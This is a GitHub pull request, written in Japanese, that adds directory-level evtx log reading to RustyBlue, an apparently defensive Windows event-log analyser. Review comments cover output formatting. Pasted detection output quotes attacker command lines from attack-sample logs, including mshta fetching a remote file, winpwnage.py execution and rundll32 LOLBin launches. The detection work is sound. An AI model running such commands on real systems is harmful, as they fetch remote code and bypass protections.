### PR TITLE
Feature/read dir#11

### LINKED ISSUE #11: ディレクトリ単位でのログ読み込み機能の追加
Rustyblueはevtxファイルを1つ指定する状態となっているが、ディレクトリ指定で複数のevtxファイルを読み込めるようにする機能を追加すれば、一括での解析ができるため便利かと思います

### PR DESCRIPTION
**Pull request by hitenkoku**
closes #11 #15 

ディレクトリ単位でのファイル読み込みができていることを確認。
ファイル名も出力されていることを確認したため #15 も本件で対処していると判断しています。

execute results

> PS <folder>\RustyBlue> .\rusty_blue.exe -d <folder>\EVTX-ATTACK-SAMPLES\Execution
> <folder>\EVTX-ATTACK-SAMPLES\Execution\evasion_execution_imageload_wuauclt_lolbas.evtxDate : 2020-10-13 20:11:42.278672 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : c:\windows\system32\cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2020-10-13 20:11:42.279861 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : c:\windows\system32\cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> <folder>\EVTX-ATTACK-SAMPLES\Execution\execution_evasion_visual_studio_prebuild_event.evtxDate : 2021-01-26 13:21:14.023510 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : powershell.exe   start-process notepad.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2021-01-26 13:21:14.296774 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\windows\system32\notepad.exe"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> date:"2021-01-26 13:21:13.690036 UTC - 2021-01-26 13:21:13.972503 UTC" record-id: "2429132 - 2429134"
> <folder>\EVTX-ATTACK-SAMPLES\Execution\exec_driveby_cve-2018-15982_sysmon_1_10.evtxDate : 2019-05-22 04:02:11.307031 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> <folder>\EVTX-ATTACK-SAMPLES\Execution\exec_msxsl_xsl_sysmon_1_7.evtxDate : 2019-05-23 17:26:08.716859 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-23 17:26:09.437896 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\cmd.exe"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> ...

### CODE REVIEW

File: src/main.rs [hunk 1]
```diff
@@ -9,6 +9,12 @@ use std::{fs, path::PathBuf, process};
 fn main() {
     if let Some(filepath) = configs::singleton().args.value_of("filepath") {
         parse_file(&filepath.to_string());
+    } else if let Some(dirpath) = configs::singleton().args.value_of("dirpath") {
+        let target_paths = parse_dir(&dirpath.to_string());
+        for target_path in target_paths {
+            print!("{}", target_path.display().to_string());
```
Comment (nishikawaakira) [inline src/main.rs:15]: 下記のように目立たせてもらっていいですか？大量に検出すると区切りがわからず。
```
println!("---------------------");
println!("【{}】", target_path.display().to_string());
println!("---------------------");
```

Comment (hitenkoku) [reply src/main.rs:16]: 修正をかけて以下のように出力されるように変更しました。
ファイル名のみ目立たせることも可能ですがそれだとどちらのログに属するものかわからなくなってしまいそうなのでファイルとパース結果を1セットとして区切るように変更しました


> PS > .\rusty_blue.exe -d .\EVTX-ATTACK-SAMPLES\Execution\
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\evasion_execution_imageload_wuauclt_lolbas.evtxDate : 2020-10-13 20:11:42.278672 
> UTC
> EventID : 1
> Message : Suspicious Command Line
> command : c:\windows\system32\cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2020-10-13 20:11:42.279861 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : c:\windows\system32\cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> ---------------------
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\execution_evasion_visual_studio_prebuild_event.evtxDate : 2021-01-26 13:21:14.023510 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : powershell.exe   start-process notepad.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2021-01-26 13:21:14.296774 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\windows\system32\notepad.exe"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> date:"2021-01-26 13:21:13.690036 UTC - 2021-01-26 13:21:13.972503 UTC" record-id: "2429132 - 2429134"
> ---------------------
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\exec_driveby_cve-2018-15982_sysmon_1_10.evtxDate : 2019-05-22 04:02:11.307031 UTCEventID : 1
> Message : Suspicious Command Line
> command : cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> ---------------------
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\exec_msxsl_xsl_sysmon_1_7.evtxDate : 2019-05-23 17:26:08.716859 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-23 17:26:09.437896 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\cmd.exe"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> ---------------------
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtxDate : 2019-05-21 15:32:57.867089 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> ---------------------
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtxDate : 2019-05-12 13:30:32.931756 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : python  winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:30:46.400506 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url  
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:30:46.556756 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\system32\cmd.exe"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:32:58.167195 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : rundll32.exe  url.dll,OpenURL file://C:/Windows/system32/calc.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:33:37.078801 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : rundll32.exe  url.dll,FileProtocolHandler calc.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:33:59.743077 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:38:00.523670 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:38:00.712733 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> Date : 2019-05-12 13:38:01.383045 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\calc.exe"
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> date:"2019-05-12 13:33:59.743077 UTC - 2019-05-12 13:37:49.604920 UTC" record-id: "16392 - 16394"
> ---------------------
> ---------------------
> .\EVTX-ATTACK-SAMPLES\Execution\exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtxDate : 2019-05-12 13:56:12.652868 UTC
> EventID : 1
> Message : Suspicious Command Line
> command : "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url  
> result : Possible command obfuscation: 100% zeroes and ones (possible numeric or binary encoding)
> 
> ---------------------

Comment (nishikawaakira) [reply src/main.rs:16]: ありがとうございます。これがprintln!ではなくprint!になっているので、
```
print!("{}", target_path.display().to_string());
```

下記が1行で出てきてしまっています。
>.\EVTX-ATTACK-SAMPLES\Execution\exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtxDate : 2019-05-12 13:56:12.652868 UTC

Comment (hitenkoku) [reply src/main.rs]: 確認ありがとうございます。 https://github.com/YamatoSecurity/RustyBlue/pull/16/commits/84428b01213e42d2db2a145d8247e2916e829dda でprintln!に修正しました

**Review by nishikawaakira — APPROVED** [review]
OKです。マージしてください

**Comment by hitenkoku** [comment]
write accessがないため私の方では実施ができないみたいです……

**Pull request merged**